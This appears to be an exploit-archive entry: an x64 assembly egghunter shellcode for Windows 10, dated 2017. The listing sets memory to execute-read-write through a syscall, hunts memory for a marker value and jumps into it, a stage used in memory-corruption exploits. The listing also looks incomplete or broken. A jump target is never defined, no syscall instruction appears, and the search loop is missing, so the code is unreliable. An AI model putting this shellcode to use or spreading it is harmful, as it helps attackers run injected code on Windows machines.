Windows 10 x64 - Egghunter Shellcode (45 bytes)

2017-04-06 21:05:02

PUBLIC Win10egghunterx64


Win10egghunterx64 PROC

push 7fh
pop rdi ; RDI is nonvolatile, so it will be preserved after syscalls

inc rdi ; parameter 1 - lpAddress - counter
mov r9b,40h ; parameter 3 - flNewProtect - 0x40 PAGE_EXECUTE_READWRITE
pop rsi ; Stack alignment before the stack setup
pop rsi
push rdi
push rsp
pop rdx ; pointer to lpAddress
push 08h ; parameter 2 - dwSize 0x8
push rsp
pop r8 ; pointer to dwSize going to r8 - can be exchanged with mov r8,rsp
mov [rdx+20h],rsp ; parameter 4 - lpflOldprotect
dec r10 ; parameter 5 - hProcess - the handle will be -1, if not set you'll get a c0000008 error

push 50h ; 0x50h for Windows 10 and Windows Server 2016 x64, 0x4Dh for Windows 7 family
pop rax


cmp al,01h ; check the response for non-allocated memory
jge _setup

_end: ; There won't be too many of these eggs in the memory

mov eax, 042303042h ; the egg
jnz _setup
jmp rdi

Win10egghunterx64 ENDP


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